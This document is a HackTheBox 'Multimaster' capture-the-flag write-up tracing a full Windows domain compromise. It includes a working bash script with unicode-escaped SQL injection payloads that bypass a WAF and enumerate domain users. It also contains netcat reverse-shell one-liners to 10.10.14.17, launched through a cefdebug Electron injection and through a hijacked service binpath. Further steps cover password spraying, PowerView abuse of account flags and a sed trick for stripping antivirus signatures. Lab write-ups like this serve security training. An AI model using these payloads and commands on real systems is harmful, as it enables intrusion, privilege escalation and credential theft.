# HackTheBox - Multimaster ## Foothold Webserver with /api/getColleagues SQL Injection with a WAF Bypass ## User ### Simple Data Exfil http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/ https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/ union injection to exfiltrate data escaped unicode characters -> Bypass the waf enumerate database -> find table Logins with usernames and hashes - crack hashes and save passwords for later #### Cracking the hashes ### Enumerate Domain Users via RID ```bash= #!/bin/bash function get_output { out=$(curl -X POST http://10.10.10.179/api/getColleagues -d "{\"name\":\"${1}\"}" -H "Content-Type: application/json" -s) resp=$(echo $out | cut -d '"' -f18) echo $resp } # TODO more enum scripts # TODO function dump_tables { } # TODO function dump_hashes { } function find_domain { payload="-1' UNION ALL SELECT 1,2,3,4,DEFAULT_DOMAIN(); --" enc_payload=$(python charunicodeescape.py "$payload") get_output $enc_payload } # Enumerates MSSQL Users by ID function find_by_id { for id in {1..300}; do payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_NAME($id); --" enc_payload=$(python charunicodeescape.py "$payload") resp=$(get_output $enc_payload) [ ! -z "$resp" ] && echo ID=$id USER=$resp sleep 2 done } function get_sid { payload="-1' UNION ALL SELECT 1,2,3,4,CONVERT(char(100),SUSER_SID('MEGACORP\Domain Users'),1); --" enc_payload=$(python charunicodeescape.py "$payload") get_output $enc_payload } # Enumerates Domain Users by SID function find_by_sid { sid=$(get_sid | head -c-9) for x in {500..1500}; do v=$(printf "%08x\n" $x | tr a-z A-Z) # print as hex and pad with 8 zeros hex=${v:6:2}${v:4:2}${v:2:2}${v:0:2} # convert to little endian payload="-1' UNION ALL SELECT 1,2,3,4,SUSER_SNAME($sid$hex); --" enc_payload=$(python charunicodeescape.py "$payload") user=$(get_output $enc_payload) [ ! -z "$user" ] && echo ID=$hex USER=$user sleep 2 done } echo "######## MSSQL Domain Enumeration ########" echo "" echo "Domain: "$(find_domain) #find_by_id #get_sid find_by_sid ``` ### Password Spraying bruteforce login via smb with found users and previously cracked passwords login with evil-winrm ## tushikikatomo -> cyork netstat -a to identify ports listening on 127.0.0.1 `ps | Select-String "Code"` VSCode is being run in intervals, we also notice the listening ports are changing and only open when VSCode is running Electron CEFDebugger listening (NodeJS) https://github.com/taviso/cefdebug we can abuse it with this tool called cefdebug ``` cefdebug.exe # identify correct url cefdebug.exe --code "process.mainModule.require('child_process').exec('C:\\windows\\system32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.17 1338')" --url ws://127.0.0.1/{<some-uuid>} ``` ## cyork -> sbauer net user cyork -> Member of the Developers Group we can read the C:\inetpub\wwwroot Directory somewhere inside we find MultimasterAPI.dll and MultimasterAPI.pdb easily decompile it with dnSpy or similar tools find credentials for the MSSQL User finder ### Password Spraying (again) another bruteforce attack with this password on all domain users (patator smb_login) we can login as sbauer, also part of Remote Management -> evil-winrm ## sbauer -> jorden run sharphound ``` -> GenericWrite privileges on jorden # Command to Get rid of comments and possible AV Signatures # sed '/<#/,/#>/d' powerview.ps1 > new_powerview.ps1 # Credit: https://implicitdeny.org/2016/03/powerview-caught-by-sep/ -> use PowerView.ps1 to abuse them in the following way: ``` ``` *Evil-WinRM* PS C:\Users\sbauer\Documents> Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose Verbose: [Get-DomainSearcher] search base: LDAP://DC=MEGACORP,DC=LOCAL Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=jorden)(name=jorden)(displayname=jorden)))) Verbose: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'jorden' *Evil-WinRM* PS C:\Users\sbauer\Documents> Get-DomainUser jorden | ConvertFrom-UACValue Name Value ---- ----- NORMAL_ACCOUNT 512 DONT_EXPIRE_PASSWORD 65536 DONT_REQ_PREAUTH 4194304 ``` ## Privesc to System jorden is Member of Server Operator group We have permissions to modify,start & stop some services Find services that are started in the context of LocalSystem reg query HKLM\System\CurrentControlSet\Services /f LocalSystem /t REG_SZ /s pick one and hope for the best ``` *Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc config wisvc binpath= "%SystemRoot%\system32\spool\drivers\color\nc.exe -e cmd.exe 10.10.14.17 1338" [SC] ChangeServiceConfig SUCCESS *Evil-WinRM* PS C:\Users\jorden\Documents> cmd /c sc start wiSvc PROFIT!!! [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. *Evil-WinRM* PS C:\Users\jorden\Documents> ``` Shell as NT Authority/System gg ###### tags: `CTF` `HTB` `Windows`